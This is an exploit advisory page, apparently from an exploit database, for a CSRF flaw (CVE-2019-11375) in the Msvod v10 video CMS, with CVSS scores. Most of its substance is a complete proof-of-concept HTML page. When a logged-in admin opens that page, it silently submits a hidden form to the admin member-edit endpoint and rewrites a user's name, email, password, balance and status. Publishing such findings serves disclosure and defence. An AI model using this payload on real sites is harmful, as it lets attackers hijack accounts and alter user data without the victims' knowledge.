Msvod 10 Cross Site Request Forgery

2019.04.24
Credit: ax8
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information # Date: 2019-04-14 # Exploit Author: ax8 # Vendor Homepage: https://github.com/Li-Siyuan # Software Link: https://www.msvodx.com/ # Version: v10 # CVE : CVE-2019-11375 Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI. <!--poc.html(change user infomation)--> <!DOCTYPE html> <html> <head> <title> CSRF Proof</title> <script type="text/javascript"> function exec1(){ document.getElementById('form1').submit(); } </script> </head> <body onload="exec1();"> <form id="form1" action="http://a.msvodx.cn/admin/member/edit.html" method="POST"> <input type="hidden" name="username" value="hacker1" /> <input type="hidden" name="nickname" value="hacker1" /> <input type="hidden" name="email" value="hacker1" /> <input type="hidden" name="tel" value="hacker1" /> <input type="hidden" name="password" value="hacker1" /> <input type="hidden" name="out_time" value="1970-01-01" /> <input type="hidden" name="money" value="30" /> <input type="hidden" name="is_permanent" value="0" /> <input type="hidden" name="status" value="1" /> <input type="hidden" name="id" value="821" /> </form> </body> </html> MISC:http://www.iwantacve.cn/index.php/archives/198/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top